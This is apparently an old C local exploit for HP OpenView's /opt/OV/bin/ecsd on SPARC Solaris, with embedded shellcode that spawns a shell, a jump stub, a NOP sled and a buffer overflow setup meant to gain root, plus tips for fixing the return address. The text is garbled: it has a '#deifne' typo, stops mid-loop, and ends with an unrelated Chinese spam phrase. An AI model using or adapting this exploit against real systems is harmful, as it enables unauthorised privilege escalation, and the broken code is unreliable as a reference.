/* www.idiotbox.co.il /opt/OV/bin/ecsd local exploit, Based on the bugtraq posting, heavily influenced by solaris exploit code by LSD. if you seem to have problems with getting ret, try using: unsigned long int get_sp() { __asm__("or %sp,%sp,%i0");} or gdb =) greets go out to: #b10z #!xor #whitehat written by sagi (sagi@idiotbox.co.il) www.idiotbox.co.il */ #define LEN 321 #deifne NOP 158 #define RET 100 #define ALLIGN 2 char shellcode[]= "\x82\x10\x20\xca\x92\x1a\x40\x09\x90\x0a\x40\x09\x91\xd0\x20\x08" "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e" "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"; char jump[]= "\x81\xc3\xe0\x08" /* jmp %o7+8 */ "\x90\x10\x00\x0e" /* mov %sp,%o0 */ ; static char nop[]="\x80\x1c\x40\x11"; main(int argc,char **argv){ char buffer[500],adr[4],*b; int i; *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+6048+1520; b=buffer; for(i=0;i

亚洲欧美在线